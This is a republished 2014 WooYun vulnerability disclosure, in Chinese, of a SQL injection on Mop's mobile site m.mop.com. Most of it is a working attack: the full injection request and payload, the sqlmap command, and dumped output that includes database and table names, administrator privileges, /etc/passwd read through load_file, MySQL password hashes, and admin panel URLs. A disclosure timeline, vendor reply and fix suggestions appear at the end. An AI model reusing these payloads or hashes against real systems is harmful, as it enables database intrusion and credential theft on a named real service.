猫扑某子站存在SQL注入漏洞

admin
admin
admin
139642
文章
114
评论
2015年7月10日09:43:53评论276 views字数 212阅读0分42秒阅读模式
摘要

2014-10-15: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向核心白帽子及相关领域专家公开
2014-11-04: 细节向普通白帽子公开
2014-11-14: 细节向实习白帽子公开
2014-11-29: 细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2014-79393

漏洞标题: 猫扑某子站存在SQL注入漏洞

相关厂商: 猫扑

漏洞作者: BMa猫扑某子站存在SQL注入漏洞

提交时间: 2014-10-15 11:32

公开时间: 2014-11-29 11:34

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 数据库账户权限过高 管理后台对外 Mysql

1人收藏

漏洞详情

披露状态:

2014-10-15: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向核心白帽子及相关领域专家公开
2014-11-04: 细节向普通白帽子公开
2014-11-14: 细节向实习白帽子公开
2014-11-29: 细节向公众公开

简要描述:

猫扑某子站存在SQL注入漏洞,权限很大,影响多个数据库

详细说明:

payload:

code 区域 
POST /viewmessage_new.jsp?log=1&mypage=viewmessage_new.jsp&ufstr=141325665400905&uid=2042281654&uidt=2084414119&version=5 HTTP/1.1
 Content-Length: 143
 Content-Type: application/x-www-form-urlencoded
 X-Requested-With: XMLHttpRequest
 Referer: http://m.mop.com:80/
 Cookie: mop3gVer=5; _mopwap_UID_T=2084414119; _mopwap_UVSTR=141325665400905; JSESSIONID=aaalWnp4J2Ntkf5YsQmKu; Hm_lpvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; Hm_lvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; _mopwapuuid=b940d441-563a-407e-82d8-7a1396e7bf55; 
 Host: m.mop.com
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
 
 curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/

方法:

code 区域 
:~# sqlmap -r '/root/Desktop/2'  --data="curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/"
 
 custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] n
 
 Are you sure you want to continue? [y/N] y

详细信息:

code 区域 
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: POST
 Parameter: email1
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND 8260=8260 AND 'CKtN'='CKtN
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND SLEEP(5) AND 'lire'='lire
 ---
 [15:01:13] [INFO] the back-end DBMS is MySQL
 web application technology: Nginx
 back-end DBMS: MySQL 5.0.11
 [15:01:13] [INFO] fetching current database
 [15:01:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
 [15:01:13] [INFO] retrieved: 
 [15:01:15] [WARNING] reflective value(s) found and filtering out
 mop
 current database:    'mop'
 [15:01:29] [WARNING] HTTP error codes detected during run:
 500 (Internal Server Error) - 13 times
 [15:01:29] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/m.mop.com'
 
 
 available databases [8]:
 [*] app
 [*] focus
 [*] information_schema
 [*] mop`
 [*] mysql
 [*] performance_schema
 [*] test
 [*] userlog
 
 current user:    '%'
code 区域 
Database: mop
 [211 tables]
 +-------------------------------------+
 | Login_MP_Receive                    |
 | UserBusiness_201101                 |
 | UserBusiness_201102                 |
 | UserBusiness_201103                 |
 | UserBusiness_201104                 |
 | UserBusiness_201105                 |
 | UserBusiness_201106                 |
 | UserBusiness_201107                 |
 | UserBusiness_201108                 |
 | UserBusiness_201109                 |
 | UserBusiness_201110                 |
 | UserBusiness_201111                 |
 | UserBusiness_201112                 |
 | UserBusiness_201201                 |
 | UserBusiness_201202                 |
 | UserBusiness_201203                 |
 | UserBusiness_201204                 |
 | UserBusiness_201205                 |
 | UserBusiness_201206                 |
 | UserBusiness_201207                 |
 | UserBusiness_201208                 |
 | UserBusiness_201209                 |
 | UserBusiness_201210                 |
 | UserBusiness_201211                 |
 | UserBusiness_201212                 |
 | UserBusiness_201301                 |
 | UserBusiness_201302                 |
 | UserBusiness_201303                 |
 | UserBusiness_201304                 |
 | UserBusiness_201305                 |
 | UserBusiness_201306                 |
 | UserBusiness_201307                 |
 | UserBusiness_201308                 |
 | UserBusiness_201309                 |
 | UserBusiness_201310                 |
 | UserBusiness_201311                 |
 | UserBusiness_201312                 |
 | UserBusiness_201401                 |
 | UserBusiness_201402                 |
 | UserBusiness_201403                 |
 | UserBusiness_201404                 |
 | UserBusiness_201405                 |
 | UserBusiness_201406                 |
 | UserBusiness_201407                 |
 | UserBusiness_201408                 |
 | UserBusiness_201409                 |
 | UserBusiness_201410                 |
 | UserOperate_201201                  |
 | UserOperate_201202                  |
 | UserOperate_201203                  |
 | UserOperate_201204                  |
 | UserOperate_201205                  |
 | UserOperate_201206                  |
 | UserOperate_201207                  |
 | UserOperate_201208                  |
 | UserOperate_201209                  |
 | UserOperate_201210                  |
 | UserOperate_201211                  |
 | UserOperate_201212                  |
 | UserOperate_201301                  |
 | UserOperate_201302                  |
 | UserOperate_201303                  |
 | UserOperate_201304                  |
 | UserOperate_201305                  |
 | UserOperate_201306                  |
 | UserOperate_201307                  |
 | UserOperate_201308                  |
 | UserOperate_201309                  |
 | UserOperate_201310                  |
 | UserOperate_201311                  |
 | UserOperate_201312                  |
 | UserOperate_201401                  |
 | UserOperate_201402                  |
 | UserOperate_201403                  |
 | UserOperate_201404                  |
 | UserOperate_201405                  |
 | UserOperate_201406                  |
 | UserOperate_201407                  |
 | UserOperate_201408                  |
 | UserOperate_201409                  |
 | UserOperate_201410                  |
 | 3g_edit_sublist2                    |
 | 3g_edit_sublist                     |
 | 3g_hotclick_info                    |
 | 3g_hotclick_statistic               |
 | 3g_huodong_view                     |
 | 3g_huodong_views_syn_list           |
 | 3g_huodong_views                    |
 | 3g_investigate1_detail              |
 | 3g_tjzq_list_hisbak                 |
 | 3g_tjzq_list                        |
 | 3g_topRegion                        |
 | 3gpet_enter                         |
 | 3gpet_mm_record                     |
 | admin_Lefttree                      |
 | admin_data_review                   |
 | admin_operator_permission           |`
 | article                             |
 | article_info                        |
 | audit_images                        |
 | audit_images_20100720               |
 | audit_images_process                |
 | audit_images_source                 |
 | baidu_keywords                      |
 | business_detail                     |
 | business_detail_20100720            |
 | business_text                       |
 | checkin                             |
 | client_statistics                   |
 | day_receive_login_mp                |
 | day_receive_login_mpBK1105          |
 | day_statistic_normal                |
 | email_record                        |
 | hi_send_log                         |
 | hot_column                          |
 | hozom_bind                          |
 | huati_table                         |
 | huati_table_tbak                    |
 | huati_table_wcup                    |
 | huodong_table_3g                    |
 | image_monitor_log                   |
 | ipdata                              |
 | keywords_2009                       |
 | login_times_patch                   |`
 | mobile_area                         |
 | mobile_bind                         |
 | mobile_bind_tmp                     |
 | mobile_up_message                   |
 | monthData                           |
 | mp_limit                            |
 | mp_limit_dzh2                       |
 | mp_tmp                              |
 | mp_tmp2                             |
 | mp_tmp_ok                           |
 | passport_delete_user                |`
 | passport_delete_user_1              |
 | passport_delete_user_tmp            |
 | postReplyStatistics                 |
 | progress                            |
 | purge_pic_upload3_postimg1          |
 | quote_reply                         |
 | quote_reply2                        |
 | recent_subject                      |
 | refere_login_temp                   |
 | refere_reg_temp                     |
 | refere_statistics                   |
 | refere_statistics_temp              |
 | referer_domain                      |
 | reg_login_num                       |
 | reg_login_num2                      |
 | reg_login_num_week                  |
 | register_return_dzh                 |
 | register_return_dzh2                |
 | register_return_dzh_week            |
 | request_header_info                 |
 | request_header_notwap               |
 | send_feed                           |
 | shualiang                           |
 | shualiang_group                     |
 | stat_page_href                      |
 | statistic_back_login                |
 | statistic_login_idlist              |
 | statistic_reg_convert               |
 | statistic_reg_idlist                |
 | statistic_source                    |
 | statistics                          |
 | statistics_new                      |
 | stockReward                         |
 | subject_key                         |
 | temp_focus                          |
 | tmp_2                               |
 | topic_subject                       |
 | torch_application                   |
 | torch_union                         |
 | unionSubReward                      |
 | unionSubRewardRec                   |
 | union_login_total                   |
 | url_counter                         |
 | usermessage                         |`
 | usermessage0                        |
 | usermessage_info                    |
 | uv_statistics                       |
 | wap_auth_user                       |`
 | wap_auth_user_path                  |
 | wap_auth_user_temp                  |
 | wap_auto_login                      |
 | wap_auto_login20110907              |
 | wap_auto_login_path                 |
 | wap_hotclick_statistic              |
 | wap_site_info                       |
 | wap_site_linkOutStatistics          |
 | wap_site_linkOutStatistics_baksLink |
 | wap_site_statistics                 |
 | wap_system_prop                     |`
 | wap_time_statistic                  |
 | wap_user_equip                      |
 | wap_user_ext                        |
 | wap_user_mobile                     |`
 | wap_user_prop                       |
 | wap_user_set                        |
 | wap_user_telnum                     |
 | wl_mobile_statistics                |
 | wl_statirtics                       |
 | wl_time_statistics                  |
 | wl_time_statistics_backup20120221   |
 | wl_time_statistics_bak120531        |
 | wl_time_statistics_bak121026        |
 | wl_uv_statistics                    |
 | xn_connector                        |
 | xn_reg                              |
 | xn_reg_bak_091104                   |
 +-------------------------------------+
code 区域 
Database: mop
 Table: wap_auth_user
 [12 columns]
 +----------------+--------------+
 | Column         | Type         |
 +----------------+--------------+
 | time           | datetime     |
 | block_order    | varchar(100) |
 | block_show_num | varchar(100) |
 | font_size      | int(11)      |
 | login_key      | varchar(200) |
 | login_times    | int(11)      |
 | mp             | int(10)      |
 | show_num       | int(11)      |
 | show_pic       | int(11)      |
 | user_id        | int(11)      |
 | user_name      | varchar(100) |
 | wc_show_num    | int(11)      |
 +----------------+--------------+

数据库权限以及范围:

code 区域 
database management system users privileges:
 [*] %% (administrator) [28]:
     privilege: ALTER
     privilege: ALTER ROUTINE
     privilege: CREATE
     privilege: CREATE ROUTINE
     privilege: CREATE TEMPORARY TABLES
     privilege: CREATE USER
     privilege: CREATE VIEW
     privilege: DELETE
     privilege: DROP
     privilege: EVENT
     privilege: EXECUTE
     privilege: FILE
     privilege: INDEX
     privilege: INSERT
     privilege: LOCK TABLES
     privilege: PROCESS
     privilege: REFERENCES
     privilege: RELOAD
     privilege: REPLICATION CLIENT
     privilege: REPLICATION SLAVE
     privilege: SELECT
     privilege: SHOW DATABASES
     privilege: SHOW VIEW
     privilege: SHUTDOWN
     privilege: SUPER
     privilege: TRIGGER
     privilege: UPDATE
     privilege: USAGE
 [*] %beauty% [1]:
     privilege: REPLICATION SLAVE
 [*] %root% (administrator) [27]:
     privilege: ALTER
     privilege: ALTER ROUTINE
     privilege: CREATE
     privilege: CREATE ROUTINE
     privilege: CREATE TEMPORARY TABLES
     privilege: CREATE USER
     privilege: CREATE VIEW
     privilege: DELETE
     privilege: DROP
     privilege: EVENT
     privilege: EXECUTE
     privilege: FILE
     privilege: INDEX
     privilege: INSERT
     privilege: LOCK TABLES
     privilege: PROCESS
     privilege: REFERENCES
     privilege: RELOAD
     privilege: REPLICATION CLIENT
     privilege: REPLICATION SLAVE
     privilege: SELECT
     privilege: SHOW DATABASES
     privilege: SHOW VIEW
     privilege: SHUTDOWN
     privilege: SUPER
     privilege: TRIGGER
     privilege: UPDATE
 [*] %slave% (administrator) [27]:
     privilege: ALTER
     privilege: ALTER ROUTINE
     privilege: CREATE
     privilege: CREATE ROUTINE
     privilege: CREATE TEMPORARY TABLES
     privilege: CREATE USER
     privilege: CREATE VIEW
     privilege: DELETE
     privilege: DROP
     privilege: EVENT
     privilege: EXECUTE
     privilege: FILE
     privilege: INDEX
     privilege: INSERT
     privilege: LOCK TABLES
     privilege: PROCESS
     privilege: REFERENCES
     privilege: RELOAD
     privilege: REPLICATION CLIENT
     privilege: REPLICATION SLAVE
     privilege: SELECT
     privilege: SHOW DATABASES
     privilege: SHOW VIEW
     privilege: SHUTDOWN
     privilege: SUPER
     privilege: TRIGGER
     privilege: UPDATE
 [*] %wapuser% (administrator) [27]:
     privilege: ALTER
     privilege: ALTER ROUTINE
     privilege: CREATE
     privilege: CREATE ROUTINE
     privilege: CREATE TEMPORARY TABLES
     privilege: CREATE USER
     privilege: CREATE VIEW
     privilege: DELETE
     privilege: DROP
     privilege: EVENT
     privilege: EXECUTE
     privilege: FILE
     privilege: INDEX
     privilege: INSERT
     privilege: LOCK TABLES
     privilege: PROCESS
     privilege: REFERENCES
     privilege: RELOAD
     privilege: REPLICATION CLIENT
     privilege: REPLICATION SLAVE
     privilege: SELECT
     privilege: SHOW DATABASES
     privilege: SHOW VIEW
     privilege: SHUTDOWN
     privilege: SUPER
     privilege: TRIGGER
     privilege: UPDATE
code 区域 
select load_file('/etc/passwd');:    'root:x:0:0:root:/root:/bin/bash/nbin:x:1:1:bin:/bin:/sbin/nologin/ndaemon:x:2:2:daemon:/sbin:/sbin/nologin/nadm:x:3:4:adm:/var/adm:/sbin/nologin/nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin/nsync:x:5:0:sync:/sbin:/bin/sync/nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown/nhalt:x:7:0:halt:/sbin:/sbin/halt/nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin/nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin/noperator:x:11:0:operator:/root:/sbin/nologin/ngames:x:12:100:games:/usr/games:/sbin/nologin/ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin/nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin/nnobody:x:99:99:Nobody:/:/sbin/nologin/ndbus:x:81:81:System message bus:/:/sbin/nologin/nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin/nabrt:x:173:173::/etc/abrt:/sbin/nologin/nhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin/nntp:x:38:38::/etc/ntp:/sbin/nologin/nsaslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin/npostfix:x:89:89::/var/spool/postfix:/sbin/nologin/narpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin/nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin/nuuidd:x:498:499:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin/ntcpdump:x:72:72::/:/sbin/nologin/nnscd:x:28:28:NSCD Daemon:/:/sbin/nologin/nmysql:x:497:498:MySQL server:/var/lib/mysql:/bin/bash/n'

后台:

code 区域 
后台:http://m.mop.com/admin/login.jsp
 数据库帐号:<code>select user,password from mysql.user; [13]:
 [*] beauty, 
 [*] wapuser, 
 [*] slave, 
 [*] wapuser, 
 [*] slave, 
 [*] wapuser, 
 [*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
 [*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
 [*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F
 [*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
 [*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F
 [*] root, *9DFF44DFF4007B348C4AC352751C6AAE5B562A8C
 [*] wapuser, *2726FA9A20F4078869AB791D5D12DF114D62CAFD

系统管理员入口:http://m.mop.com/test/server_rsh.jsp</code>

可以拿到shell,也可以拖库<这两个都没做,不深入>

漏洞证明:

猫扑某子站存在SQL注入漏洞

猫扑某子站存在SQL注入漏洞

猫扑某子站存在SQL注入漏洞

猫扑某子站存在SQL注入漏洞

猫扑某子站存在SQL注入漏洞

猫扑某子站存在SQL注入漏洞

猫扑某子站存在SQL注入漏洞

猫扑某子站存在SQL注入漏洞

修复方案:

平常也喜欢逛猫扑,要是有个礼物就好了

1,代码做好过滤

2,数据库权限设置

3,后台访问限制

4,系统帐号限制,不然可以读到某些文件

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-10-15 17:14

厂商回复:

谢谢,非常感谢!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin